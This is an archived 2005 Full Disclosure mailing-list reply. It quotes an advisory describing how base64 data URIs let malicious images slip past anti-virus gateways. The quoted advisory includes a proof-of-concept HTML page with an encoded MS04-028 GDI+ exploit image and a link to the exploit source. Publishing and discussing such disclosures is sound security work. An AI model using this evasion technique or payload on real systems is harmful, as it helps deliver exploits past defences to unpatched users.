Full Disclosure mailing list archives
RE: Multi-vendor AV gateway image inspection bypassvulnerability
From: "Mark Senior" <Mark.Senior () gov ab ca>
Date: Tue, 11 Jan 2005 13:22:45 -0700
Trend Micro OfficeScan client (version 6.5, virus definitions from 10 Jan 2005) didn't catch it in my case. I copied the html section from the original message straight to a text file and scanned that. I suppose it's possible some text wrapping munged the original posting Cheers Mark -----Original Message----- From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Danny Sent: January 11, 2005 12:14 To: Darren Bounds Cc: bugs () securitytracker com; vulnwatch () vulnwatch org; bugtraq () securityfocus com; list () securiteam com; full-disclosure () lists netsys com Subject: Re: [Full-disclosure] Multi-vendor AV gateway image inspection bypassvulnerability On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multi-vendor AV gateway image inspection bypass vulnerability January 10, 2005 A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well other security technologies such as IDS and
IPS) inspection of HTTP image content. By leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme. A remote attack may encode a malicious image within the body of an HTML formatted document to circumvent content inspection. For example: http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft
MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee), however, when the same image is base64 encoded using the technique described in
RFC 2397 (documented below), inspection is not performed and is delivered rendered by the client. While Microsoft Internet Explorer does not support the RFC 2397 URL scheme; Firefox, Safari, Mozilla and Opera do and will render the data
and thus successfully execute the payload if the necessary OS and/or application patches have not been applied. ## BEGIN HTML ## <html> <body> <img src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD// gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBw kJ CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv /b AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj Iy MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAA AA AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMo GR oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2 Rl ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc bH yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAA yMnK0tPU1dbX2Nna4eLj5OXm5+AA AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQ gU QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm Nk ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8 TF xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD/ xsfIycrS09TV1tfY2dri4+/ Z"> </body> </html> ## END HTML ## Solution: While AV vendor patches are not yet available, fixes for all currently
known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame. Contributions: Thanks to Scott Roeder and Jacinto Rodriquez their assistance in platform testing.
I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response? ...D _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Multi-vendor AV gateway image inspection bypassvulnerability Mark Senior (Jan 11)